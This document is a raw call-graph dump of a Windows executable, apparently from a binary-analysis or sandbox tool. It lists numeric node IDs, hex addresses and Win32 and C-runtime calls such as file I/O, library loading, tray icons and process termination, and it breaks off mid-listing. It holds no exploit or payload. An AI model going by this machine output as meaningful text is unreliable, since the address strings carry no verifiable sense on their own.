calls 102430->102432 102431->102309 102432->102430 102434 c73aa2 __wsopen_s 102433->102434 102435 cb40da ___scrt_fastfail 102434->102435 102436 c73abb 102434->102436 102439 cb40f6 GetOpenFileNameW 102435->102439 102657 c75851 102436->102657 102441 cb4145 102439->102441 102443 c78577 22 API calls 102441->102443 102444 cb415a 102443->102444 102444->102444 102446 c73ad9 102685 c762d5 102446->102685 103352 c73624 7 API calls 102477->103352 102479 c7347a 102480 c735b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 102479->102480 102480->102330 102482 c73996 ___scrt_fastfail 102481->102482 103353 c75f32 102482->103353 102485 c73a1c 102487 cb40cd Shell_NotifyIconW 102485->102487 102488 c73a3a Shell_NotifyIconW 102485->102488 103357 c761a9 102488->103357 102490 c73a50 102490->102338 102492 c73969 102491->102492 102493 c73919 ___scrt_fastfail 102491->102493 102492->102337 102494 c73938 Shell_NotifyIconW 102493->102494 102494->102492 102495->102320 102496->102327 102498 cb22d0 __wsopen_s 102497->102498 102499 c755a1 GetModuleFileNameW 102498->102499 102500 c7b329 22 API calls 102499->102500 102501 c755c7 102500->102501 102502 c75851 23 API calls 102501->102502 102503 c755d1 102502->102503 102503->102334 102505 c7b338 _wcslen 102504->102505 102506 c9017b 22 API calls 102505->102506 102507 c7b360 __fread_nolock 102506->102507 102508 c9014b 22 API calls 102507->102508 102509 c7b376 102508->102509 102509->102336 102511 c76b93 102510->102511 102512 cb57fe 102510->102512 103397 c76ba4 102511->103397 102514 c9014b 22 API calls 102512->102514 102516 cb5808 _wcslen 102514->102516 102515 c76b9e 102519 c77bb5 22 API calls 102515->102519 102517 c9017b 22 API calls 102516->102517 102518 cb5841 __fread_nolock 102517->102518 102519->102350 102522 c9014b 102520->102522 102523 c9016a 102522->102523 102527 c9016c 102522->102527 102540 c9ed7c 102522->102540 102547 c9521d 7 API calls 2 library calls 102522->102547 102523->102362 102525 c909dd 102549 c93614 RaiseException 102525->102549 102527->102525 102548 c93614 RaiseException 102527->102548 102528 c909fa 102528->102362 102533 c90150 102530->102533 102531 c9ed7c ___std_exception_copy 21 API calls 102531->102533 102532 c9016a 102532->102364 102533->102531 102533->102532 102536 c9016c 102533->102536 102552 c9521d 7 API calls 2 library calls 102533->102552 102535 c909dd 102554 c93614 RaiseException 102535->102554 102536->102535 102553 c93614 RaiseException 102536->102553 102538 c909fa 102538->102364 102545 ca3b93 _abort 102540->102545 102541 ca3bd1 102551 c9f649 20 API calls _abort 102541->102551 102543 ca3bbc RtlAllocateHeap 102544 ca3bcf 102543->102544 102543->102545 102544->102522 102545->102541 102545->102543 102550 c9521d 7 API calls 2 library calls 102545->102550 102547->102522 102548->102525 102549->102528 102550->102545 102551->102544 102552->102533 102553->102535 102554->102538 102556 c763e4 __wsopen_s 102555->102556 102557 c78577 22 API calls 102556->102557 102558 c76416 102556->102558 102557->102558 102568 c7644c 102558->102568 102624 c7655e 102558->102624 102560 c7b329 22 API calls 102561 c76543 102560->102561 102564 c76a7c 22 API calls 102561->102564 102562 c7b329 22 API calls 102562->102568 102563 c7655e 22 API calls 102563->102568 102565 c7654f 102564->102565 102565->102369 102567 c7651a 102567->102560 102567->102565 102568->102562 102568->102563 102568->102567 102627 c76a7c 102568->102627 102570 c75021 102569->102570 102571 c7bd71 102569->102571 102575 c7bed9 102570->102575 102572 c9014b 22 API calls 102571->102572 102573 c7bd7b 102572->102573 102574 c9017b 22 API calls 102573->102574 102574->102570 102576 c7befc __fread_nolock 102575->102576 102577 c7beed 102575->102577 102576->102373 102577->102576 102578 c9017b 22 API calls 102577->102578 102578->102576 102580 c9014b 22 API calls 102579->102580 102581 c75038 102580->102581 102581->102376 102583 c7be38 102582->102583 102584 c7be67 102583->102584 102639 c7bfa5 40 API calls 102583->102639 102584->102379 102587 c751d4 102586->102587 102588 c751f2 102586->102588 102589 c750b4 102587->102589 102591 c7bed9 22 API calls 102587->102591 102590 c78577 22 API calls 102588->102590 102592 c94d98 102589->102592 102590->102589 102591->102589 102593 c94e1b 102592->102593 102594 c94da6 102592->102594 102642 c94e2d 40 API calls 3 library calls 102593->102642 102601 c94dcb 102594->102601 102640 c9f649 20 API calls _abort 102594->102640 102597 c94e28 102597->102389 102598 c94db2 102641 ca2b5c 26 API calls _abort 102598->102641 102600 c94dbd 102600->102389 102601->102389 102603 c77e1a 102602->102603 102604 c9014b 22 API calls 102603->102604 102605 c77e28 102604->102605 102643 c78445 102605->102643 102608 c78470 102646 c7c760 102608->102646 102610 c78480 102611 c9017b 22 API calls 102610->102611 102612 c7514c 102610->102612 102611->102612 102613 c78a60 102612->102613 102614 c78a76 102613->102614 102615 cb6737 102614->102615 102621 c78a80 102614->102621 102655 c8b7a2 22 API calls 102615->102655 102617 cb6744 102656 c7b4c8 22 API calls 102617->102656 102619 c78b9b 102619->102430 102620 cb6762 102620->102620 102621->102617 102621->102619 102622 c78b94 102621->102622 102623 c9014b 22 API calls 102622->102623 102623->102619 102633 c7c2c9 102624->102633 102626 c76569 102626->102558 102628 c76a8b 102627->102628 102632 c76aac __fread_nolock 102627->102632 102630 c9017b 22 API calls 102628->102630 102629 c9014b 22 API calls 102631 c76abf 102629->102631 102630->102632 102631->102568 102632->102629 102634 c7c2dc 102633->102634 102638 c7c2d9 __fread_nolock 102633->102638 102635 c9014b 22 API calls 102634->102635 102636 c7c2e7 102635->102636 102637 c9017b 22 API calls 102636->102637 102637->102638 102638->102626 102639->102584 102640->102598 102641->102600 102642->102597 102644 c9014b 22 API calls 102643->102644 102645 c7513e 102644->102645 102645->102608 102647 c7c76b 102646->102647 102648 cc1285 102647->102648 102653 c7c773 ISource 102647->102653 102649 c9014b 22 API calls 102648->102649 102650 cc1291 102649->102650 102651 c7c77a 102651->102610 102653->102651 102654 c7c7e0 22 API calls ISource 102653->102654 102654->102653 102655->102617 102656->102620 102715 cb22d0 102657->102715 102660 c7587d 102662 c78577 22 API calls 102660->102662 102661 c75898 102663 c7bd57 22 API calls 102661->102663 102664 c75889 102662->102664 102663->102664 102717 c755dc 102664->102717 102667 c73a57 102668 cb22d0 __wsopen_s 102667->102668 102669 c73a64 GetLongPathNameW 102668->102669 102670 c78577 22 API calls 102669->102670 102671 c73a8c 102670->102671 102672 c753f2 102671->102672 102673 c7bf73 22 API calls 102672->102673 102674 c75404 102673->102674 102675 c75851 23 API calls 102674->102675 102676 c7540f 102675->102676 102677 cb4d5b 102676->102677 102678 c7541a 102676->102678 102683 cb4d7d 102677->102683 102731 c8e36b 41 API calls 102677->102731 102679 c76a7c 22 API calls 102678->102679 102681 c75426 102679->102681 102725 c71340 102681->102725 102684 c75439 102684->102446 102732 c76679 102685->102732 102688 cb5336 102857 ce36b8 102688->102857 102689 c76679 94 API calls 102691 c7630e 102689->102691 102691->102688 102693 c76316 102691->102693 102692 cb5347 102694 cb534b 102692->102694 102695 cb5368 102692->102695 102698 c76322 102693->102698 102699 cb5353 102693->102699 102906 c766e7 102694->102906 102697 c9017b 22 API calls 102695->102697 102706 cb53ad 102697->102706 102754 c73b39 102698->102754 102912 cde30e 82 API calls 102699->102912 102702 cb5361 102702->102695 102704 cb555e 102710 cb5566 102704->102710 102705 c766e7 68 API calls 102705->102710 102706->102704 102706->102710 102712 c7b329 22 API calls 102706->102712 102883 cd9ff8 102706->102883 102886 ce1519 102706->102886 102892 c7bba9 102706->102892 102900 c75d21 102706->102900 102913 cd9f27 42 API calls _wcslen 102706->102913 102710->102705 102914 cda215 82 API calls __wsopen_s 102710->102914 102712->102706 102716 c7585e GetFullPathNameW 102715->102716 102716->102660 102716->102661 102718 c755ea 102717->102718 102721 c7adf4 102718->102721 102720 c73ac4 102720->102667 102722 c7ae02 102721->102722 102723 c7ae0b __fread_nolock 102721->102723 102722->102723 102724 c7c2c9 22 API calls 102722->102724 102723->102720 102723->102723 102724->102723 102726 c71352 102725->102726 102730 c71371 __fread_nolock 102725->102730 102728 c9017b 22 API calls 102726->102728 102727 c9014b 22 API calls 102729 c71388 102727->102729 102728->102730 102729->102684 102730->102727 102731->102677 102915 c7663e LoadLibraryA 102732->102915 102737 cb5648 102739 c766e7 68 API calls 102737->102739 102738 c766a4 LoadLibraryExW 102923 c76607 LoadLibraryA 102738->102923 102741 cb564f 102739->102741 102743 c76607 3 API calls 102741->102743 102745 cb5657 102743->102745 102944 c7684a 102745->102944 102746 c766ce 102746->102745 102747 c766da 102746->102747 102748 c766e7 68 API calls 102747->102748 102750 c762fa 102748->102750 102750->102688 102750->102689 102753 cb567e 102755 cb415f 102754->102755 102756 c73b62 102754->102756 103201 cda215 82 API calls __wsopen_s 102755->103201 102758 c9017b 22 API calls 102756->102758 102759 c73b86 102758->102759 102760 c77aab CloseHandle 102759->102760 102761 c73b94 102760->102761 102762 c7bf73 22 API calls 102761->102762 102765 c73b9d 102762->102765 102763 c73bfa 102766 c7bf73 22 API calls 102763->102766 102764 c73bec 102764->102763 102767 cb4179 102764->102767 103202 cdd5aa SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 102764->103202 102768 c77aab CloseHandle 102765->102768 102769 c73c06 102766->102769 102767->102763 102767->102764 102770 c73ba6 102768->102770 103171 c73ae9 102769->103171 102773 c77aab CloseHandle 102770->102773 102776 c73baf 102773->102776 102774 cb41d5 102774->102763 103189 c76fa2 SetFilePointerEx SetFilePointerEx SetFilePointerEx CreateFileW CreateFileW 102776->103189 102777 c7bf73 22 API calls 102779 c73c1e 102777->102779 102781 c75851 23 API calls 102779->102781 102780 c73bc9 102782 c73bd1 102780->102782 102783 cb4591 102780->102783 102785 c73c2c 102781->102785 103190 c76c5f 27 API calls ISource 102782->103190 103214 cda215 82 API calls __wsopen_s 102783->103214 103176 c73b1c 102785->103176 102786 cb45a6 102786->102786 102791 c73be3 103191 c76c48 SetFilePointerEx SetFilePointerEx SetFilePointerEx 102791->103191 102794 c73c6f 102796 c7bf73 22 API calls 102794->102796 102795 cb41eb 102797 c77aab CloseHandle 102795->102797 102798 c73c78 102796->102798 102799 cb41f4 102797->102799 102800 c7bf73 22 API calls 102798->102800 102801 c76679 94 API calls 102799->102801 102802 c73c81 102800->102802 102803 cb421c 102801->102803 103192 c7568e 22 API calls 102802->103192 102805 cb4528 102803->102805 102808 ce36b8 80 API calls 102803->102808 103211 cda215 82 API calls __wsopen_s 102805->103211 102806 c73c98 103193 c77bb5 22 API calls 102806->103193 102810 cb423b 102808->102810 102812 c766e7 68 API calls 102810->102812 102811 c73ca9 SetCurrentDirectoryW 102816 c73cbc 102811->102816 102813 cb4249 102812->102813 102813->102805 102814 cb4251 102813->102814 102815 c9014b 22 API calls 102814->102815 102817 c9017b 22 API calls 102816->102817 102819 c73ccf 102817->102819 102822 c73e5c 102836 c73e2a ISource 103185 c77aab 102836->103185 102856 cb4516 102856->102836 102858 ce36d4 102857->102858 102859 c76874 64 API calls 102858->102859 102860 ce36e8 102859->102860 103223 ce3827 102860->103223 102863 c7684a 40 API calls 102864 ce3717 102863->102864 102865 c7684a 40 API calls 102864->102865 102866 ce3727 102865->102866 102867 c7684a 40 API calls 102866->102867 102868 ce3742 102867->102868 102869 c7684a 40 API calls 102868->102869 102870 ce375d 102869->102870 102871 c76874 64 API calls 102870->102871 102872 ce3774 102871->102872 102873 c9ed7c ___std_exception_copy 21 API calls 102872->102873 102874 ce377b 102873->102874 102875 c9ed7c ___std_exception_copy 21 API calls 102874->102875 102876 ce3785 102875->102876 102877 c7684a 40 API calls 102876->102877 102878 ce3799 102877->102878 102879 ce32bd 27 API calls 102878->102879 102880 ce37af 102879->102880 102882 ce3700 102880->102882 103229 ce2c8d 102880->103229 102882->102692 102884 c9017b 22 API calls 102883->102884 102885 cda028 __fread_nolock 102884->102885 102885->102706 102887 ce1524 102886->102887 102888 c9014b 22 API calls 102887->102888 102889 ce153b 102888->102889 102890 c7b329 22 API calls 102889->102890 102891 ce1546 102890->102891 102891->102706 102893 c7bc33 102892->102893 102899 c7bbb9 __fread_nolock 102892->102899 102895 c9017b 22 API calls 102893->102895 102894 c9014b 22 API calls 102896 c7bbc0 102894->102896 102895->102899 102897 c7bbde 102896->102897 102898 c9014b 22 API calls 102896->102898 102897->102706 102898->102897 102899->102894 102901 c75d34 102900->102901 102903 c75dd8 102900->102903 102902 c9017b 22 API calls 102901->102902 102905 c75d66 102901->102905 102902->102905 102903->102706 102904 c9014b 22 API calls 102904->102905 102905->102903 102905->102904 102907 c766f1 102906->102907 102909 c766f8 102906->102909 102908 c9e9e8 67 API calls 102907->102908 102908->102909 102910 c7670f 102909->102910 102911 cb56a4 FreeLibrary 102909->102911 102910->102699 102912->102702 102913->102706 102914->102710 102916 c76656 GetProcAddress 102915->102916 102917 c76674 102915->102917 102918 c76666 102916->102918 102920 c9e95b 102917->102920 102918->102917 102919 c7666d FreeLibrary 102918->102919 102919->102917 102952 c9e89a 102920->102952 102922 c76698 102922->102737 102922->102738 102924 c7661c GetProcAddress 102923->102924 102925 c7663b 102923->102925 102926 c7662c 102924->102926 102928 c76720 102925->102928 102926->102925 102927 c76634 FreeLibrary 102926->102927 102927->102925 102929 c9017b 22 API calls 102928->102929 102930 c76735 102929->102930 103004 c7423c 102930->103004 102932 c76741 __fread_nolock 102933 cb56c2 102932->102933 102938 c7677c 102932->102938 103012 ce3a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 102932->103012 103013 ce3a92 74 API calls 102933->103013 102936 c7684a 40 API calls 102936->102938 102937 c76810 ISource 102937->102746 102938->102936 102938->102937 102940 cb5706 102938->102940 102941 c76874 64 API calls 102938->102941 103007 c76874 102940->103007 102941->102938 102943 c7684a 40 API calls 102943->102937 102945 cb5760 102944->102945 102946 c7685c 102944->102946 103045 c9ec34 102946->103045 102949 ce32bd 103154 ce310d 102949->103154 102951 ce32d8 102951->102753 102955 c9e8a6 CallCatchBlock 102952->102955 102953 c9e8b4 102977 c9f649 20 API calls _abort 102953->102977 102955->102953 102957 c9e8e4 102955->102957 102956 c9e8b9 102978 ca2b5c 26 API calls _abort 102956->102978 102959 c9e8e9 102957->102959 102960 c9e8f6 102957->102960 102979 c9f649 20 API calls _abort 102959->102979 102969 ca83e1 102960->102969 102963 c9e8ff 102965 c9e912 102963->102965 102966 c9e905 102963->102966 102964 c9e8c4 __fread_nolock 102964->102922 102981 c9e944 LeaveCriticalSection __fread_nolock 102965->102981 102980 c9f649 20 API calls _abort 102966->102980 102970 ca83ed CallCatchBlock 102969->102970 102982 ca32d1 EnterCriticalSection 102970->102982 102972 ca83fb 102983 ca847b 102972->102983 102976 ca842c __fread_nolock 102976->102963 102977->102956 102978->102964 102979->102964 102980->102964 102981->102964 102982->102972 102991 ca849e 102983->102991 102984 ca84f7 102985 ca4ff0 _abort 20 API calls 102984->102985 102986 ca8500 102985->102986 102988 ca2d38 _free 20 API calls 102986->102988 102989 ca8509 102988->102989 102990 ca8408 102989->102990 103001 ca3778 11 API calls 2 library calls 102989->103001 102996 ca8437 102990->102996 102991->102984 102991->102990 102999 c994fd EnterCriticalSection 102991->102999 103000 c99511 LeaveCriticalSection 102991->103000 102993 ca8528 103002 c994fd EnterCriticalSection 102993->103002 103003 ca3319 LeaveCriticalSection 102996->103003 102998 ca843e 102998->102976 102999->102991 103000->102991 103001->102993 103002->102990 103003->102998 103005 c9014b 22 API calls 103004->103005 103006 c7424e 103005->103006 103006->102932 103008 c76883 103007->103008 103011 cb5780 103007->103011 103014 c9f053 103008->103014 103012->102933 103013->102938 103017 c9ee1a 103014->103017 103016 c76891 103016->102943 103021 c9ee26 CallCatchBlock 103017->103021 103018 c9ee32 103042 c9f649 20 API calls _abort 103018->103042 103020 c9ee58 103030 c994fd EnterCriticalSection 103020->103030 103021->103018 103021->103020 103023 c9ee37 103043 ca2b5c 26 API calls _abort 103023->103043 103024 c9ee64 103031 c9ef7a 103024->103031 103027 c9ee78 103044 c9ee97 LeaveCriticalSection __fread_nolock 103027->103044 103029 c9ee42 __fread_nolock 103029->103016 103030->103024 103032 c9ef9c 103031->103032 103033 c9ef8c 103031->103033 103035 c9eea1 28 API calls 103032->103035 103034 c9f649 __dosmaperr 20 API calls 103033->103034 103036 c9ef91 103034->103036 103038 c9efbf 103035->103038 103036->103027 103037 c9f03e 103037->103027 103038->103037 103039 c9df7b 62 API calls 103038->103039 103040 c9efe6 103039->103040 103041 ca97a4 __wsopen_s 28 API calls 103040->103041 103041->103037 103042->103023 103043->103029 103044->103029 103048 c9ec51 103045->103048 103047 c7686d 103047->102949 103049 c9ec5d CallCatchBlock 103048->103049 103050 c9ec9d 103049->103050 103051 c9ec70 ___scrt_fastfail 103049->103051 103052 c9ec95 __fread_nolock 103049->103052 103061 c994fd EnterCriticalSection 103050->103061 103075 c9f649 20 API calls _abort 103051->103075 103052->103047 103054 c9eca7 103062 c9ea68 103054->103062 103056 c9ec8a 103076 ca2b5c 26 API calls _abort 103056->103076 103061->103054 103066 c9ea7a ___scrt_fastfail 103062->103066 103068 c9ea97 103062->103068 103063 c9ea87 103150 c9f649 20 API calls _abort 103063->103150 103065 c9ea8c 103151 ca2b5c 26 API calls _abort 103065->103151 103066->103063 103066->103068 103070 c9eada __fread_nolock 103066->103070 103077 c9ecdc LeaveCriticalSection __fread_nolock 103068->103077 103069 c9ebf6 ___scrt_fastfail 103153 c9f649 20 API calls _abort 103069->103153 103070->103068 103070->103069 103078 c9dcc5 103070->103078 103085 ca90c5 103070->103085 103152 c9d2e8 26 API calls 4 library calls 103070->103152 103075->103056 103076->103052 103077->103052 103079 c9dcd1 103078->103079 103080 c9dce6 103078->103080 103081 c9f649 __dosmaperr 20 API calls 103079->103081 103080->103070 103082 c9dcd6 103081->103082 103083 ca2b5c _abort 26 API calls 103082->103083 103084 c9dce1 103083->103084 103084->103070 103086 ca90ef 103085->103086 103087 ca90d7 103085->103087 103088 ca9459 103086->103088 103094 ca9134 103086->103094 103089 c9f636 __dosmaperr 20 API calls 103087->103089 103091 c9f636 __dosmaperr 20 API calls 103088->103091 103090 ca90dc 103089->103090 103092 c9f649 __dosmaperr 20 API calls 103090->103092 103093 ca945e 103091->103093 103095 ca90e4 103092->103095 103096 c9f649 __dosmaperr 20 API calls 103093->103096 103094->103095 103097 ca913f 103094->103097 103103 ca916f 103094->103103 103095->103070 103098 ca914c 103096->103098 103099 c9f636 __dosmaperr 20 API calls 103097->103099 103101 ca2b5c _abort 26 API calls 103098->103101 103100 ca9144 103099->103100 103102 c9f649 __dosmaperr 20 API calls 103100->103102 103101->103095 103102->103098 103104 ca9188 103103->103104 103105 ca91ca 103103->103105 103106 ca91ae 103103->103106 103104->103106 103139 ca9195 103104->103139 103109 ca3b93 __fread_nolock 21 API calls 103105->103109 103107 c9f636 __dosmaperr 20 API calls 103106->103107 103108 ca91b3 103107->103108 103110 c9f649 __dosmaperr 20 API calls 103108->103110 103112 ca91e1 103109->103112 103114 ca91ba 103110->103114 103111 cafc1b __fread_nolock 26 API calls 103115 ca9333 103111->103115 103113 ca2d38 _free 20 API calls 103112->103113 103116 ca91ea 103113->103116 103117 ca2b5c _abort 26 API calls 103114->103117 103118 ca93a9 103115->103118 103121 ca934c GetConsoleMode 103115->103121 103119 ca2d38 _free 20 API calls 103116->103119 103148 ca91c5 __fread_nolock 103117->103148 103120 ca93ad ReadFile 103118->103120 103122 ca91f1 103119->103122 103123 ca9421 GetLastError 103120->103123 103124 ca93c7 103120->103124 103121->103118 103125 ca935d 103121->103125 103126 ca91fb 103122->103126 103127 ca9216 103122->103127 103128 ca942e 103123->103128 103129 ca9385 103123->103129 103124->103123 103130 ca939e 103124->103130 103125->103120 103131 ca9363 ReadConsoleW 103125->103131 103133 c9f649 __dosmaperr 20 API calls 103126->103133 103135 ca97a4 __wsopen_s 28 API calls 103127->103135 103134 c9f649 __dosmaperr 20 API calls 103128->103134 103140 c9f613 __dosmaperr 20 API calls 103129->103140 103129->103148 103143 ca93ec 103130->103143 103144 ca9403 103130->103144 103130->103148 103131->103130 103136 ca937f GetLastError 103131->103136 103132 ca2d38 _free 20 API calls 103132->103095 103137 ca9200 103133->103137 103138 ca9433 103134->103138 103135->103139 103136->103129 103141 c9f636 __dosmaperr 20 API calls 103137->103141 103142 c9f636 __dosmaperr 20 API calls 103138->103142 103139->103111 103140->103148 103141->103148 103142->103148 103146 ca8de1 __fread_nolock 31 API calls 103143->103146 103145 ca941a 103144->103145 103144->103148 103147 ca8c21 __fread_nolock 29 API calls 103145->103147 103146->103148 103149 ca941f 103147->103149 103148->103132 103149->103148 103150->103065 103151->103068 103152->103070 103153->103065 103157 c9e858 103154->103157 103156 ce311c 103156->102951 103160 c9e7d9 103157->103160 103159 c9e875 103159->103156 103161 c9e7e8 103160->103161 103162 c9e7fc 103160->103162 103168 c9f649 20 API calls _abort 103161->103168 103167 c9e7f8 __alldvrm 103162->103167 103170 ca36b2 11 API calls 2 library calls 103162->103170 103164 c9e7ed 103169 ca2b5c 26 API calls _abort 103164->103169 103167->103159 103168->103164 103169->103167 103170->103167 103172 cb22d0 __wsopen_s 103171->103172 103173 c73af6 GetCurrentDirectoryW 103172->103173 103174 c78577 22 API calls 103173->103174 103175 c73b19 103174->103175 103175->102777 103215 c7b120 103176->103215 103179 c76d47 103184 c76d5e 103179->103184 103180 cb592a SetFilePointerEx 103181 c76de5 SetFilePointerEx SetFilePointerEx 103183 c73c5e 103181->103183 103182 cb5919 103182->103180 103183->102794 103183->102795 103184->103180 103184->103181 103184->103182 103184->103183 103186 c77ab5 103185->103186 103187 c77ac4 103185->103187 103186->102822 103187->103186 103188 c77ac9 CloseHandle 103187->103188 103188->103186 103189->102780 103190->102791 103191->102764 103192->102806 103193->102811 103201->102764 103202->102774 103211->102856 103214->102786 103216 c7b12e 103215->103216 103217 c7b19b 103215->103217 103219 c73b2d 103216->103219 103220 c7b16c ReadFile 103216->103220 103222 c8f18b SetFilePointerEx 103217->103222 103219->103179 103220->103219 103221 c7b186 103220->103221 103221->103216 103221->103219 103222->103216 103224 ce383b 103223->103224 103225 c7684a 40 API calls 103224->103225 103226 ce36fc 103224->103226 103227 ce32bd 27 API calls 103224->103227 103228 c76874 64 API calls 103224->103228 103225->103224 103226->102863 103226->102882 103227->103224 103228->103224 103230 ce2c98 103229->103230 103231 ce2ca6 103229->103231 103232 c9e95b 29 API calls 103230->103232 103233 ce2ceb 103231->103233 103234 c9e95b 29 API calls 103231->103234 103257 ce2caf 103231->103257 103232->103231 103258 ce2f16 40 API calls __fread_nolock 103233->103258 103236 ce2cd0 103234->103236 103236->103233 103239 ce2cd9 103236->103239 103237 ce2d2f 103238 ce2d54 103237->103238 103240 ce2d33 103237->103240 103259 ce2b30 103238->103259 103239->103257 103266 c9e9e8 103239->103266 103241 ce2d40 103240->103241 103245 c9e9e8 67 API calls 103240->103245 103248 c9e9e8 67 API calls 103241->103248 103241->103257 103245->103241 103248->103257 103257->102882 103258->103237 103260 c9ed7c ___std_exception_copy 21 API calls 103259->103260 103261 ce2b3e 103260->103261 103262 c9ed7c ___std_exception_copy 21 API calls 103261->103262 103263 ce2b4f 103262->103263 103264 c9ed7c ___std_exception_copy 21 API calls 103263->103264 103265 ce2b5b 103264->103265 103267 c9e9f4 CallCatchBlock 103266->103267 103268 c9ea1a 103267->103268 103269 c9ea05 103267->103269 103278 c9ea15 __fread_nolock 103268->103278 103280 c994fd EnterCriticalSection 103268->103280 103297 c9f649 20 API calls _abort 103269->103297 103271 c9ea0a 103298 ca2b5c 26 API calls _abort 103271->103298 103274 c9ea36 103281 c9e972 103274->103281 103278->103257 103280->103274 103282 c9e97f 103281->103282 103283 c9e994 103281->103283 103325 c9f649 20 API calls _abort 103282->103325 103289 c9e98f 103283->103289 103300 c9df7b 103283->103300 103297->103271 103298->103278 103352->102479 103354 c739eb 103353->103354 103355 c75f4e 103353->103355 103354->102485 103387 cdd11f 42 API calls 103354->103387 103355->103354 103356 cb5070 DestroyIcon 103355->103356 103356->103354 103358 c761c6 103357->103358 103359 c762a8 103357->103359 103388 c77ad5 103358->103388 103359->102490 103362 cb5278 LoadStringW 103366 cb5292 103362->103366 103363 c761e1 103364 c78577 22 API calls 103363->103364 103365 c761f6 103364->103365 103367 c76203 103365->103367 103374 cb52ae 103365->103374 103369 c7bed9 22 API calls 103366->103369 103373 c76229 ___scrt_fastfail 103366->103373 103367->103366 103368 c7620d 103367->103368 103370 c76b7c 22 API calls 103368->103370 103369->103373 103371 c7621b 103370->103371 103393 c77bb5 22 API calls 103371->103393 103375 c7628e Shell_NotifyIconW 103373->103375 103374->103373 103376 c7bf73 22 API calls 103374->103376 103377 cb52f1 103374->103377 103375->103359 103378 cb52d8 103376->103378 103396 c8fe6f 51 API calls 103377->103396 103394 cda350 23 API calls 103378->103394 103381 cb5310 103383 c76b7c 22 API calls 103381->103383 103382 cb52e3 103395 c77bb5 22 API calls 103382->103395 103385 cb5321 103383->103385 103386 c76b7c 22 API calls 103385->103386 103386->103373 103387->102485 103389 c9017b 22 API calls 103388->103389 103390 c77afa 103389->103390 103391 c9014b 22 API calls 103390->103391 103392 c761d4 103391->103392 103392->103362 103392->103363 103393->103373 103394->103382 103395->103377 103396->103381 103398 c76bb4 _wcslen 103397->103398 103399 c76bc7 103398->103399 103400 cb5860 103398->103400 103407 c77d74 103399->103407 103402 c9014b 22 API calls 103400->103402 103404 cb586a 103402->103404 103403 c76bd4 __fread_nolock 103403->102515 103405 c9017b 22 API calls 103404->103405 103406 cb589a __fread_nolock 103405->103406 103409 c77d8a 103407->103409 103411 c77d85 __fread_nolock 103407->103411 103408 cb6528 103409->103408 103410 c9017b 22 API calls 103409->103410 103410->103411 103411->103403 103413 c94f4b _abort 103412->103413 103414 c94f52 103413->103414 103415 c94f64 103413->103415 103451 c95099 GetModuleHandleW 103414->103451 103436 ca32d1 EnterCriticalSection 103415->103436 103418 c94f57 103418->103415 103452 c950dd GetModuleHandleExW 103418->103452 103419 c95009 103440 c95049 103419->103440 103423 c94f6b 103423->103419 103425 c94fe0 103423->103425 103437 ca2518 103423->103437 103426 c94ff8 103425->103426 103430 ca2791 _abort 5 API calls 103425->103430 103431 ca2791 _abort 5 API calls 103426->103431 103427 c95052 103460 cb20a9 5 API calls _ValidateLocalCookies 103427->103460 103428 c95026 103443 c95058 103428->103443 103430->103426 103431->103419 103436->103423 103461 ca2251 103437->103461 103480 ca3319 LeaveCriticalSection 103440->103480 103442 c95022 103442->103427 103442->103428 103481 ca397f 103443->103481 103446 c95086 103449 c950dd _abort 8 API calls 103446->103449 103447 c95066 GetPEB 103447->103446 103448 c95076 GetCurrentProcess TerminateProcess 103447->103448 103448->103446 103450 c9508e ExitProcess 103449->103450 103451->103418 103453 c9512a 103452->103453 103454 c95107 GetProcAddress 103452->103454 103455 c95139 103453->103455 103456 c95130 FreeLibrary 103453->103456 103457 c9511c 103454->103457 103458 c90dfc _ValidateLocalCookies 5 API calls 103455->103458 103456->103455 103457->103453 103459 c94f63 103458->103459 103459->103415 103464 ca2200 103461->103464 103463 ca2275 103463->103425 103465 ca220c CallCatchBlock 103464->103465 103472 ca32d1 EnterCriticalSection 103465->103472 103467 ca221a 103473 ca22a1 103467->103473 103471 ca2238 __fread_nolock 103471->103463 103472->103467 103476 ca22c1 103473->103476 103477 ca22c9 103473->103477 103474 c90dfc _ValidateLocalCookies 5 API calls 103475 ca2227 103474->103475 103479 ca2245 LeaveCriticalSection _abort 103475->103479 103476->103474 103477->103476 103478 ca2d38 _free 20 API calls 103477->103478 103478->103476 103479->103471 103480->103442 103482 ca39a4 103481->103482 103483 ca399a 103481->103483 103488 ca334a 5 API calls 2 library calls 103482->103488 103485 c90dfc _ValidateLocalCookies 5 API calls 103483->103485 103486 c95062 103485->103486 103486->103446 103486->103447 103487 ca39bb 103487->103483 103488->103487 103489 c71044 103494 c72793 103489->103494 103491 c7104a 103529 c90413 29 API calls __onexit 103491->103529 103493 c71054 103530 c72a38 103494->103530 103498 c7280a 103499 c7bf73 22 API calls 103498->103499 103500 c72814 103499->103500 103501 c7bf73 22 API calls 103500->103501 103502 c7281e 103501->103502 103503 c7bf73 22 API calls 103502->103503 103504 c72828 103503->103504 103505 c7bf73 22 API calls 103504->103505 103506 c72866 103505->103506 103507 c7bf73 22 API calls 103506->103507 103508 c72932 103507->103508 103540 c72dbc 103508->103540 103512 c72964 103513 c7bf73 22 API calls 103512->103513 103514 c7296e 103513->103514 103567 c83160 103514->103567 103516 c72999 103577 c73166 103516->103577 103518 c729b5 103519 c729c5 GetStdHandle 103518->103519 103520 cb39e7 103519->103520 103521 c72a1a 103519->103521 103520->103521 103522 c9014b 22 API calls 103520->103522 103524 c72a27 OleInitialize 103521->103524 103523 cb39f7 103522->103523 103584 ce0ac4 InitializeCriticalSectionAndSpinCount 103523->103584 103524->103491 103526 cb3a00 103587 ce12eb 103526->103587 103529->103493 103590 c72a91 103530->103590 103533 c72a91 22 API calls 103534 c72a70 103533->103534 103535 c7bf73 22 API calls 103534->103535 103536 c72a7c 103535->103536 103537 c78577 22 API calls 103536->103537 103538 c727c9 103537->103538 103539 c7327e 6 API calls 103538->103539 103539->103498 103541 c7bf73 22 API calls 103540->103541 103542 c72dcc 103541->103542 103543 c7bf73 22 API calls 103542->103543 103544 c72dd4 103543->103544 103597 c781d6 103544->103597 103547 c781d6 22 API calls 103548 c72de4 103547->103548 103549 c7bf73 22 API calls 103548->103549 103550 c72def 103549->103550 103551 c9014b 22 API calls 103550->103551 103552 c7293c 103551->103552 103553 c73205 103552->103553 103554 c73213 103553->103554 103555 c7bf73 22 API calls 103554->103555 103556 c7321e 103555->103556 103557 c7bf73 22 API calls 103556->103557 103558 c73229 103557->103558 103559 c7bf73 22 API calls 103558->103559 103560 c73234 103559->103560 103561 c7bf73 22 API calls 103560->103561 103562 c7323f 